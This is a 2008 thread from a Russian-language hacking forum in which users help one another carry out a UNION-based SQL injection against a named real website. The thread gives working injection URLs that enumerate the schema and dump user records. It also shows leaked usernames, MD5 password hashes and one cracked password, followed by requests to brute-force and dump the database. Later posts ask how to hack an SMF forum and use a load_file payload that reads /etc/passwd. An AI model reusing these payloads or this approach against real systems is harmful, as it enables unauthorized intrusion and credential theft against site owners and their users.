HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.07.2008, 16:47
masterBlack
Новичок
Регистрация: 12.06.2008
Сообщений: 19
Провел на форуме:
70897

Репутация: 3
По умолчанию

Нужна помощь с колонками!


http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,2,3,4,5,6,7/*
http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,@@version,3,4,5,6,7/* тут 5.0.33
http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,TABLE_NAME,3,4,5,6,7 FROM INFORMATION_SCHEMA.TABLES--
получаю имена таблиц:
<code>» CHARACTER_SETS (0) » COLLATIONS (0) » COLLATION_CHARACTER_SET_APPLICABILITY (0) » COLUMNS (0) » COLUMN_PRIVILEGES (0) » KEY_COLUMN_USAGE (0) » ROUTINES (0) » SCHEMATA (0) » SCHEMA_PRIVILEGES (0) » STATISTICS (0) » TABLES (0) » TABLE_CONSTRAINTS (0) » TABLE_PRIVILEGES (0) » TRIGGERS (0) » USER_PRIVILEGES (0) » VIEWS (0) » cat_body (0) » cat_level (0) » cat_rubrics (0) » cat_set (0) » righttable (0) » user_group (0) » userlog (0) » usertable (0) » variables (0)</code>

http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,column_name,3,4,5,6,7 from+information_schema.columns+where+table_name=0 x757365727461626c65+limit+1,1/*

http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,concat_ws(0x3a,usr_name,usr_passw ord),3,4,5,6,7+from+usertable+limit+1,1/*

получаю Денис:876993158b491f4626155b468ffb6edc
876993158b491f4626155b468ffb6edc=zerozero
но к админике не подходит! Почему?
В user_group нашол usr_id » grp_id но колонки с пасом не нашел!
 
Ответить с цитированием

  #2  
Старый 12.07.2008, 16:54
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

masterBlack
Колонка usr_login
 
Ответить с цитированием

  #3  
Старый 12.07.2008, 17:26
masterBlack
Новичок
Регистрация: 12.06.2008
Сообщений: 19
Провел на форуме:
70897

Репутация: 3
По умолчанию

Вбиваю я
http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,column_name,3,4,5,6,7%20from+info rmation_schema.columns+where+table_name=0x7573725f 6c6f67696e+limit+1,1/*
а мне отображается пустая страница!
 
Ответить с цитированием

  #4  
Старый 12.07.2008, 17:58
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

В чём проблема то?
http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,column_name,3,4,5,6,7+from+inform ation_schema.columns+where+table_name=0x7573657274 61626c65--
usr_id (0) » usr_name (0) » grp_id (0) » usr_login (0) » usr_password (0)

http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,concat_ws(0x3a,usr_id,usr_name,gr p_id,usr_login,usr_password),3,4,5,6,7+from+userta ble+limit+0,1--

1:Николай:0:aries:b3bd3c36b29a243c9f510720c d417d14
__________________
..
 
Ответить с цитированием

  #5  
Старый 12.07.2008, 18:47
masterBlack
Новичок
Регистрация: 12.06.2008
Сообщений: 19
Провел на форуме:
70897

Репутация: 3
По умолчанию

Оооо пасиба! а то Я чет ваше прогнался и накосячил с запросом!
А сбрутить поможете?
 
Ответить с цитированием

  #6  
Старый 12.07.2008, 21:26
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

masterBlack, https://forum.antichat.org/thread67624.html
__________________
..

Последний раз редактировалось Constantine; 16.07.2008 в 22:25..
 
Ответить с цитированием

  #7  
Старый 12.07.2008, 21:44
masterBlack
Новичок
Регистрация: 12.06.2008
Сообщений: 19
Провел на форуме:
70897

Репутация: 3
По умолчанию

А как сдампить бд зная логин и пасс админа, но не зная ее располажения и названия? БД MySQL!!!
 
Ответить с цитированием

  #8  
Старый 13.07.2008, 00:16
Sharingan
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662

Репутация: 435
По умолчанию

Помогите разобратся, надо знач SMF похекать,делаю все согласно тому что написано тут , но когда захожу на
http://site.com/forum/Themes/default/index.php меня перебрасывает на индекс форума, и я посмотрел на других форумах (с данной версий движка) с этого файла также перекидывает на главную форума, версию вроде не фиксили, что я не так делаю, спасибо
 
Ответить с цитированием

  #9  
Старый 13.07.2008, 12:20
2la.painkiller
Новичок
Регистрация: 22.05.2008
Сообщений: 27
Провел на форуме:
80944

Репутация: 0
По умолчанию

Народ
1. load_file(0x2F6574632F706173737764)
x2F6574632F706173737764
это какая кодировка? чем или где можно расшифровать?
2. чем или где можно закодировать, расшифровать в 16бит?
Заранее спс
 
Ответить с цитированием

  #10  
Старый 13.07.2008, 16:13
MaSTeR GэN
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110

Репутация: 133
По умолчанию

2la.painkiller
1.x'hexstring'
2.http://www.bigprism.com/online-tools/base64-hex-ascii-encoder-decoder.html
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.